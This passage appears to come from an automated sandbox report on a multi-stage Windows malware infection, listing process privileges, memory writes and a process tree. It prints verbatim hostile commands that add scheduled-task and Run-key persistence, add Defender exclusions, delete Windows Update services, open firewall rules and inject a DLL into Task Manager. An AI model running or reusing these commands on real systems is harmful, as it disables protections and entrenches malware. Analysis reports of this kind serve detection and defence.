Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3984 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 3984 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 3984 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 3984 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 3984 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 3984 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 3984 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1752 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 1752 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 1752 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2704 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2704 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2704 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2704 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 2124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 2124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 2124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2704 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 2704 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 2704 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 448 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 448 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 448 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 448 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 2704 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 2704 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 2704 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 2704 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe
PID 2704 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe
PID 2704 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe
PID 4924 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4924 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4924 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1460 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 228 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 228 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1020 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\fileexe.exe

"C:\Users\Admin\AppData\Local\Temp\fileexe.exe"

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /IM chrome.exe /F

C:\Windows\SYSTEM32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1460 -ip 1460

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 628

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 880

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1432

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC

C:\Program Files\Notepad\Chrome\updater.exe

"C:\Program Files\Notepad\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe zuhwtyqtfkk

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Name, VideoProcessor

C:\Windows\System32\conhost.exe

